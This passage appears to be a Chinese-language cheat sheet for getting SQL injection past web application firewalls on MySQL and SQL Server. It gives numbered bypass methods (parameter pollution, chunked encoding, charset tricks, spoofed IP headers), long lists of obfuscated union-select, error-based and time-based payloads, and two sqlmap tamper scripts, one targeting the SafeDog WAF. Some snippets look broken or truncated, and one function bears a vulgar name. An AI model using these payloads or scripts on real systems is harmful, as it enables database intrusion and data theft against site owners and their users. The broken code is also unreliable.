对基于正则表达式的WAF,我们猜测安全工程师写WAF规则时,可能不知道函数名与左括号之间可以存在特殊字符,或者遗漏可以存在特殊字符。例如匹配函数”concat()”的规则写法,“concat(”或者”concat\s*(”,就没有考虑到一些特殊字符。相应的绕过方法,在特殊位置引入特殊的分隔符,逐个测试。这些特殊分隔符发现也是通过Fuzz出来的。
绕过技巧:•函数与括号之间可以插入空白符或多行注释达到绕过•GET型请求转POST型
id=-1' union select null,concat_ws(char%0a%0d(32,58,32),user,password) from users #
绕过方式3:协议未覆盖绕过(mysql)
文件头的属性是传输前对提交的数据进行编码发送到服务器。其中 multipart/form-data 表示该数据被编码为一条消息,页上的每个控件对应消息中的一个部分。所以,当 waf 没有规则匹配该协议传输的数据时可被绕过。
绕过技巧:在 http 头里的 Content-Type 提交表单支持四种协议:
Content-Type: text/html;
Content-Type: application/json;charset:utf-8;
Content-Type:type/subtype ;parameter
Content-Type:application/x-www-form-urlencoded
Content-Type:multipart/form-data
使用表单请求中的multipart/form-data•关键词换行•GET型请求转POST型
id=-1' union select null,concat_ws
(char(32,58,32),user,password)
from users #
绕过方式4:多行注释符替换绕过(mysql)
select/**/*/**/from/**/[dbo].[User]/**/where id=1
绕过方式5:HPP分割参数绕过(sqlserver)
绕过原理规则缺陷/特性:HTTP参数污染
HPP是HTTP Parameter Pollution的缩写,意为HTTP参数污染。
在ASPX中,有一个比较特殊的HPP特性,当GET/POST/COOKIE同时提交的参数id,服务端接收参数id的顺序GET,POST,COOKIE,中间通过逗号链接,于是就有了这个idea。
UNION、SELECT、FROM 三个关键字分别放在GET/POST/COOKIE的位置,通过ASPX的这个特性连起来,堪称完美的一个姿势,压根不好防。
但姿势利用太过于局限:使用Request.Params["id"]来获取参数,G-P-C获取到参数拼接起来,仅仅作为Bypass分享一种思路而已。
绕过技巧:•GET型请求转POST型•参数传递的顺序:GET->POST->COOKIE•使用多行注释符/**/来闭合分割参数的逗号
post方式 id=get,cookie里面 id=cookie, 包里面 id=post
get 方式 id=11111111111111&id=')+and+1=db_name()--+- 双写id
绕过方式6:chunked
普通的sqlmap是没有--chunk这个参数可以使用的 sqlmap --tamper=chunkedtamper.py
chunkedtamper.py:内容
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/3/12 5:45 PM
# @Author : w8ay
# @File : chunk.py
"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from lib.core.enums import PRIORITY
from random import sample
__priority__ = PRIORITY.NORMAL
def dependencies():
pass
def randomIP():
numbers = []
while not numbers or numbers[0] in (10, 172, 192):
numbers = sample(xrange(1, 255), 4)
return '.'.join(str(_) for _ in numbers)
def tamper(payload, **kwargs):
"""
Append a fake HTTP header 'X-Forwarded-For'
"""
headers = kwargs.get("headers", {})
headers["Transfer-Encoding"] = "Chunked"
print "tamper"
print payload
# return payload
payload = "\r\n" + "2" + "\r\n" + "id" + "\r\n" + "0" + "\r\n\r\n"
return payload
绕过方式7:ip伪造头
X-Forwarded-For:127.0.0.1
X-Forwarded-Host:127.0.0.1
X-Client-IP:127.0.0.1
X-remote-IP:127.0.0.1
X-remote-addr:127.0.0.1
True-Client-IP:127.0.0.1
X-Client-IP:127.0.0.1
Client-IP:127.0.0.1
X-Real-IP:127.0.0.1
绕过方式8:利用multipart/form-data 绕过
http 头里的Content-Type 提交表单支持三种协议
application/x-www-form-urlencoded 编码模式post 提交
multipart/form-data 文件上传模式
text/plain 文本模式
Content-Type: multipart/form-data;
boundary=---------------------------28566904301101419271642457175
boundary 这是用来匹配的值
Content-Disposition: form-data; name="id" 这也能作为post 提交
所以程序会接收到构造的SQL 注入语句-1 union select 1,user()
绕过方式9:url二次编码绕过
绕过方式10:白名单绕过。
白名单通常有目录
/admin
/phpmyadmin
/admin.php
/index.php/1.jpg&id=1
/index.php/1.jpg=/1.jpg&id=1
/1.css=/1.css&id=1
绕过方式11:pipline 绕过注入
用burpsuite 抓包提交复制整个包信息放在第一个包最后,把第一个包close 改成keep-alive 把
brupsuite 自动更新Content-Length 勾去掉。
漏洞12:post,OPTIONS,HEAD绕过
有些waf 只要存在GET 或者POST 优先匹配POST 从而导致被绕过。
有些程序是json 提交参数,程序也是json 接收再拼接到SQL 执行json 格式通常不会被拦截。所以可以绕过waf.
{'id':1 union select 1,2,3,'submit':1}
同样text/xml 也不会被拦截
POST GET传数据都会被waf拦截,将请求方式修改为OPTIONS,HEAD等成功绕过了waf
漏洞13: 花扩号绕过
select 1,2 union select{x 1},user()
漏洞14:HTTP 数据编码绕过
改Content-Type 中的charset 的参数值,我们改为ibm037 这个协议编码
Content-Type: application/x-www-form-urlencoded;charset:ibm037
未编码
id=123&pass=pass%3d1
透过IBM037 编码
%89%84=%F1%F2%F3&%97%81%A2%A2=%97%81%A2%A2~%F1
1. and 绕过
使用 || 代替 or
使用&&代替and
&& 1=1
&& 1=2
|| 1=0
|| 1=1
+or+0x3a!=1--+
+or+0x3a=1--+
and (select 1)=(Select 0x1)
and (select 1)=(Select 0xA*1000)
and ~1>1
and 1=1
and 1=2
and -2<-1
and hex(1)>~1
and hex(1)>-1
and true=true --+
and!!!!1=1
and/*@%$^(*/ 1=1
or 1=0
or 1=1
2. order by 绕过
/&id=1308%20order%20by%2035&b=/
into @a,@b,@c,@d;
order /*//--/*/ by
Order%A0By
order/**/by
order/*--*/by
order/*//*/by
order/**/by
3. union select 绕过
%09union%09select 1,2
%0aunion%0aselect 1,2
%0baunion%0bselect 1,2
%0caunion%0cselect 1,2
%0d%0aunion%0d%0aselect 1,2
%0daunion%0dselect 1,2
--%0dunion select
%23?%0auion%20?%23?%0aselect
%23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
%23x%0A/*!database*/()
%25%37%35%25%36%45%25%36%39%25%36%46%25%36%45%25%32%30%25%37%33%25%36%35%25%36%43%25%36%35%25%36%33%25%37%34
%250aunion%250aselect 1,2
%252f%252a*/union%252f%252a /select%252f%252a*/
%2f**%2funion%2f**%2fselect
%2f**%2funion%2f**%2fselect%2f**%2f
%53eLEct
%55nion %53eLEct
%55nion(%53elect 1,2,3)-- -
%55nion(%53elect)
%75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7
(select 1)=(select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)/*!union*/
*9e0UnIoN
*9e0UnIoN*9e0slect
/%2A%2A/union/%2A%2A/select/%2A%2A/
/* */union/* */select/ */1,2;
/*!%53eLEct*/
/*!%55NiOn*/ /*!%53eLEct*/
/*!12345union*//*!12345select*/1,2;
/*!40000union*//*!40000select*/1,2
/*!50000UniON SeLeCt*/
/*!50000union*//*!50000select*/1,2
/*!select*/
/*!u%6eion*/ /*!se%6cect*/
/*!uNIOn*/ /*!SelECt*/
/*!union*//*!00000all*//*!00000select*/1,2
/*!union*//*!select*/1,2
/*!union*/+/*!select*/
/*!UnIoN*/SeLecT+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**//*!union*//**//*!select*//**/
/**/UNION/**//*!50000SELECT*//**/
/**/union/**/select/**/
/*--*/union/*--*/select/*--*/
/*中文*/union/*中文*/select/*中文*/1,2;
\Nselect
\Nunion
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
+#uNiOn+#sEleCt
--+%0d%0aunion--+%0d%0aselect--+%0d%0a1,--+%0d%0a2
+un/**/ion+se/**/lect
+uni%0bon+se%0blect+
+UnIOn%0d%0aSeleCt%0d%0a
+union+distinct+select+
+union+distinctROW+select+
+UNunionION+SEselectLECT+
and(select 1)=(Select 0xA*1000)/*!uNIOn*//*!SeLECt*/ 1,user()
e0union(select!1,)
e0union(select(1),(select user from user limit 1)
e0union(select(1),)
e0union(select/!50000/1,)
e0union(select@'id',)
e0union(select{1},)
e0union(select~1,)
e0union(select+1,)
e0union(select'1',(select user from user limit 1)
e0union(select'1',)
e0union(select-1,)
null+UNION+SELECT+1,2
REVERSE(noinu)+REVERSE(tceles)
s%u0065lect
se%0blect
sel%e%ct
sele%ct
sele/**/ct
select union select{x 1},
u%6eion s%65lect
u%6eion se%6cect
un?+un/**/ion+se/**/lect+
uni%0bon+se%0blect
uni%6fn distinct%52OW s%65lect
uni%u006fn sel%u0065ct
unio%6e %73elect
unio%6e%20%64istinc%74%20%73elect
union -- 1%0a select
union -- hex()%0a select
union %23%0aall select
union (/*!/**/ SeleCT */ 1,2,3)
union (select)
union /*!50000%53elect*/
union /*//--/*/ select
union /*@%$^(*/ select
union /*@%$^(*/ select --+
union all select
union all select 1,2
union all%23%0a select
union DISTINCT select
union DISTINCT select 1,2
UnIoN SeLeCt
union select * from (select 1)a join (select 2)b join(select user())c join(select 4)d******;
union select 1,(select(schema_name)from(information_schema.SCHEMATA)limit 0,1)
union select 1,(select(schema_name)from/*!12345information_schema.SCHEMATA*/limit 0,1)
union select 1,(select(schema_name)from{x information_schema.SCHEMATA}limit 0,1)
uNIoN sELecT 1,2
union select all
union select DISTINCT
union%20%64istinctRO%57%20select
union%20/*!44509select*/%20
union%2053elect
union%20all%23%0a%20select%20
union%20distinct%20select
union%20select%20
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
union%a0%0aselect 1,'2',
union%a0%0aselect 1,'2','3',
union(select%0aall{x users}from{x ddd})
union(select%0adistinct{x users}from{x ddd})
union(select%0adistinctrow{x users}from{x ddd})
union/*!23000select*/
union/*%00*/%23a%0A/*!/*!select
union/*%00*/%23a%0A/*!/*!select%20
union/*%0a%0b%20%a0--*/select
UNION/*&test=1*/SELECT/*&pwn=2*/
union/*&username=*/select
union/**/select/**/1,2
union/*/!*!**/select
union/*/!--**/select
UNION/*/%21*%21**/SELECT
union/*/-*!!*/select
union/*//\\\*/select+1,2--+
union/*//--\\\*/select+1,2--+
UNiOn/*/1/*/select
UNiOn--+%02%0d%0aselect
union+/*!select*/
union+distinctROW+select
UNIunionONSeLselectECT
ununionion selselectect
user/**/()--+
过滤了%23%0a 却不过滤%2d%2d%0a
4. database() 绕过
%23x%0A/*!database*/()
and+0x3a!=info()--
database /*//--/*/ ()
database%23x%0A()
database()||’
database/*!20553()*/--+
database/**/()
database/*xxx*/()
database+()
db_name()
user/**/()--+
union select+1, (select+password+from+`users`+limit+1)--+
union/*//--//*/select+1,(select+password+from+`users`+limit+1)--
1'||1=geometryCollection(updatexml(1,concat(0x7e,database(),0x7e),1))--+
UnIoN%A0SeLeCT*FrOm(SeLeCt 1)a JOIN (SeLeCt 2)b JOIN (SeLeCt 3)c JOIN (SeLeCt 4)d JOIN (SeLeCt 5)e JOIN (SeLeCt 6)f JOIN (SeLeCt 7)g JOIN (SeLeCt 8)h JOIN (SeLeCt 9)i JOIN (SeLeCt 10)j JOIN (SeLeCt 11)k JOIN (SeLeCt 12)l JOIN (SeLeCt 13)m JOIN (SeLeCt 14)n JOIN (SeLeCt 15)o JOIN (SeLeCt 16)p JOIN (SeLeCt 17)q JOIN (SeLeCt 18)r JOIN (SeLeCt 19)s JOIN (SeLeCt 20)t JOIN (SeLeCt 21)w JOIN (SeLeCt 22)x JOIN (SeLeCt 23)y JOIN (SeLeCt 24)z JOIN (SeLeCt 25)2a-- -
5. from 绕过
%23%0afrom
%2d%2d%0afrom
%2d%2d%0from
%a0from
/*!%23/*%0afrom*/
/*!00000%23/*%0afrom*/
/*!from*/
\Nfrom
1efrom
2.0 from
8e0from
CHAR(102, 114, 111, 109)
e0FrOm
FrOFrOmm
FrOm
from/*!--+/*%0ainformation_schema.columns*/
select(1)from
select{x user}from{x mysql.user};
6. information_schema的绕过
`information_schema`.schemata
`information_schema`.`schemata`
information_schema.`schemata`
(information_schema.schemata)
information_schema/**/.schemata
Information_schema./**_**/Tables
7:单引号绕过'
"" (mysql)
select * from users where username=0x61646D696E; # select * from users where username='admin'; select hex('admin');
库名.表名:admin.users
admin+.user
select{x user}from{x mysql.user};
8. substr截取字符绕过
查询m 等于select(substr(database() from 1 for 1))页面返回正常
select * from users where id=1 and 'm'=(select(substr(database() from 1 for 1)));
可以进一步优化m 换成hex 0x6D 这样就避免了单引号
select * from users where id=1 and 0x6D=(select(substr(database() from 1 for 1)));
substr 函数被拦截 换成 mid
select * from users where id=1 and 'm'=(select(mid(database() from 1 for 1)));
select * from users where id=1 and 0x6D=(select(mid(database() fm 1 for 1)));
9. limit拦截
limit 1 默认返回第一条数据。也可以使用limit 1 offset 0 从零开始返回第一条记录.
可以用以下等价函数代替来绕过过滤:
1、sleep函数可以用benchmark函数代替
2、ascii函数可以用hex, bin函数代替
3、group_concat函数可以用concat_ws函数代替
4、updatexml函数可以用extractvalue函数代替
AND 等价于 &&
OR 等价于 ||
= 等价于 like
+ 代替 空格
sleep() 等价于 benchmark()
mid()substring() 等价于 substr()
Mid(version(),1,1)
Substr(version(),1,1)
Substring(version(),1,1)
Lpad(version(),1,1)
Rpad(version(),1,1)
Left(version(),1)
reverse(right(reverse(version()),1)
concat(version(),'|',user());
concat_ws('|',1,2,3)
Char(49)
Substring(@@version,1,1)
Left(@@version,1)
Right(@@version,1)
limit 1 offset 0
mid(version() from 1 for 1)
Hex(‘a’)
Unhex(61)
Ascii(1)
用like或in代替=
select * from user where username='user';
select * from user where username like 'user';
select * from user where username in('user');
and exp(~(select * from(select user())x));--+
and exp(~(select%23%0apassword%23%0afrom(select%23%0auser())x));--+
http://id/index.php?id=1 and 1 like 1
like "[%23]" /*!10440union select*/
试延时 payload,将里面的 o 替换为 %u00ba
7. 普通函数的绕过
如:
'
"
.
`users`
~
hex(user/**/(/**/))
8. 报错注入函数的绕过
/*!5000updatexml*/(1,1,1)
/*!11440updatexml*/(1,1,1)
/*!11441extractvalue*/(1, concat(0x5c, (SELECT @@version)))
`updatexml`(1,(select @@version),1)
总之,将报错函数用/*!*/或者``包括起来。
报错注入中使用polygon()函数替换常用的updatexml()函数select polygon((select * from (select * from (select @@version) f) x));
盲注绕过&延时绕过
and!!!!if((substr((select hex(user/**/(/*!*/))),1,1)>1),sleep/**/(/*!5*/),1)
and!!!!1=1 除了!还可以使用~&- 当符号数量为偶数时为真,相当于一个空格,可以用来绕过and后不能使用数字或者字符。
apache特性:
&id=1&id=2 他只解析最后一个
MySQL特性:
空格可以由其它字符替代
select id,contents,time from news where
news_id=1①union②select③1,2,username④from⑤admin
•位置①
•可以利用其它控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0•可以利用注释符号替换空格:/**/、%23est%0d%0a、 --+a%0d%0a•可以利用数学运算以及数据类型:news_id=1.0,news_id=1E0,news_id=\N
•位置②
•可以利用其它控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0•可以利用注释符号替换空格:/**/、%23test%0d%0a、 --+a%0d%0a•可以利用括号:union(select 1,2)
•位置③
•可以利用其它控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0•可以利用注释符号替换空格:/**/、%23test%0d%0a、 --+a%0d%0a•可以利用其它符号:+ 、- 、 ~ 、!、@•位置④
•可以利用其它控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0•可以利用注释符号替换空格:/**/、%23test%0d%0a、 --+a%0d%0a•大括号{}:union select {``1},{x 2}•可利用数学运算以及数据类型:
union select usename,2.0from admin union select username,8e0from admin union select username,\Nfrom admin
•位置⑤
•可以利用其它控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0•可以利用注释符号替换空格:/**/、%23test%0d%0a、 --+a%0d%0a•反引号`:union select 1,table_name,3 from`information_schema`.`tables`limit 0,1%23•内联注释:union select 1,table_name,3 from /*!50001information_schema.tables*/ limit 0,1%23•大括号{}:union select 1,table_name,3 from{x information_schema.tables}limit 0,1%23•小括号():union select 1,table_name,3 from(information_schema.tables)limit 0,1%23
SQLServer特性
空格可以由其它字符替代
select id,contents,time from news where news_id=1①union②select③1,2,db_name()④from⑤admin
位置①
可以利用其它控制字符替换空格:%01~%0F、%11~%1F
可以利用注释符号:/**/、—+a%0d%0a
可利用数学运算符以及数据类型:news_id=1.0,news_id=1e0,news_id=1-1
位置②
可以利用其它控制字符替换空格:%01~%0F、%11~%1F
可以利用注释符号:/**/、—+a%0d%0a
可以利用加号+替换空格:union+select
位置③
可以利用其它控制字符替换空格:%01~%0F、%11~%1F
可以利用注释符号:/**/、—+a%0d%0a
可利用数学运算符:+、-、~、. (注:其中-、~、.号必须是select查询的第一个字段的数据类型为数字型才能使用)
可以利用小括号()替换空格:select(1),2,db_name()
位置④
可以利用其它控制字符替换空格:%01~%0F、%11~%1F
可以利用注释符号:/**/、—+a%0d%0a
可利用其他字符:%80~%FF(需要IIS服务器支持)
位置⑤
可以利用其它控制字符替换空格:%01~%0F、%11~%1F
可以利用注释符号:/**/、—+a%0d%0a
可利用其他字符:%80~%FF(需要IIS服务器支持)
可以利用点号.替换空格:from.users
可以利用中括号[]替换空格:from[users]
Unicode编码
常用的几个符号的一些Unicode编码:
单引号: %u0027、%u02b9、%u02bc、%u02c8、%u2032、%uff07、%c0%27、%c0%a7、%e0%80%a7
空格:%u0020、%uff00、%c0%20、%c0%a0、%e0%80%a0
左括号:%u0028、%uff08、%c0%28、%c0%a8、%e0%80%a8
右括号:%u0029、%uff09、%c0%29、%c0%a9、%e0%80%a9
mysql sqlmap tamper
#%21/usr/bin/env python
# MySQLByPassForSafeDog
# Code By:Tas9er
import re
import string
import os
import random
from lib.core.enums import DBMS
from lib.core.common import singleTimeWarnMessage
def dependencies():
singleTimeWarnMessage("MySQLByPassForSafeDog / Code By:Tas9er '%s' only %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
def tamper(payload, **kwargs):
payload=payload.replace('AND','/*%2144575%26%26*/')
payload=payload.replace('ORD','/*%2144575ORD*/')
payload=payload.replace('OR ','/*%2144575OR*/ ')
payload=payload.replace('UNION SELECT','UNION/*/%21*%21**/SELECT')
payload=payload.replace('ORDER BY',str(caonimabi())+'ORDER/**/BY')
payload=payload.replace('information_schema.tables','/*!%23%0ainformation_schema.tables*/')
payload=payload.replace('@','/*%2144575%40*/')
payload=payload.replace('SELECT','/*%2144575%53%45%4c%45%43%54*/')
payload=payload.replace('table_name',str(caonimabi())+'table_name')
payload=payload.replace('MID',str(caonimabi())+'MID')
payload=payload.replace('CAST',str(caonimabi())+'CAST')
payload=payload.replace('USER()','%23a%0aUSER/*!*/()')
payload=payload.replace('CURRENT_%23a%0aUSER/*!*/()',str(caonimabi())+'CURRENT_USER()')
payload=payload.replace('SESSION_%23a%0aUSER/*!*/()','%23a%0aSESSION_USER()')
payload=payload.replace('()','/*%2144575%28%29*/')
payload=payload.replace(' (','/**/(')
payload=payload.replace(',(',',/**/(')
payload=payload.replace('),',')/**/,')
payload=payload.replace(') ',')/**/')
payload=payload.replace('/','%2F')
payload=payload.replace('*','%2A')
return payload
def caonimabi():
temp = ''.join(random.sample(string.ascii_letters + string.digits, random.randint(3,9)))
return '/*Tas9er'+temp+'*/'